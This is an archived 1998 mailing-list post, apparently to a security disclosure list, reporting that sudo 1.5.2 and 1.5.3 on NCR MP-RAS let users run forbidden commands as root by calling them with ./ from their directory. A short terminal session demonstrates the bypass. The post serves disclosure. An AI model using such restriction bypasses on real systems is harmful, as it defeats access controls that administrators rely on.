hole in sudo for MP-RAS.

osiris@COURIER.CB.LUCENT.COM
Mon, 12 Jan 1998 12:29:09 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Chip Salzenberg: "Buffer overflows in Deliver: get 2.1.13"
Previous message: KSR[T]: "KSR[T] Advisory #6: deliver"
Next in thread: Cy Schubert - ITSD Open Systems Group: "Re: hole in sudo for MP-RAS."

There is a bug in sudo versions (at least) 1.5.2 and 1.5.3 on NCR's MP-RAS
that makes it trivial to bypass sudo's restrictions. I reported this to
the sudo-bugs address given in the source on 12/23/97, but never heard back,
so screw 'em. It is important to note that MP-RAS is one of the platforms
listed in the RUNSON file included with the distribution, so there are
probably many people running this; I imagine you will want to reconsider it
if you are one of them.

Basically, if you define a command that a user is not allowed to run, they
will still be allowed to run it if they cd to the directory containing the
command and preface it with ./. Here's an example:

/da8 atlas> sudo date
Sorry, user osiris is not allowed to execute "/usr/bin/date" as root on atlas.

/da8 atlas> sudo /bin/date
Sorry, user osiris is not allowed to execute "/bin/date" as root on atlas.

/da8 atlas> cd /usr/bin
/usr/bin atlas> sudo ./date
Mon Jan 12 12:15:34 EST 1998

I'm not sure if this problem affects any other platforms. I believe HP-UX
9.04 at least is safe.

--jml

Next message: Chip Salzenberg: "Buffer overflows in Deliver: get 2.1.13"
Previous message: KSR[T]: "KSR[T] Advisory #6: deliver"
Next in thread: Cy Schubert - ITSD Open Systems Group: "Re: hole in sudo for MP-RAS."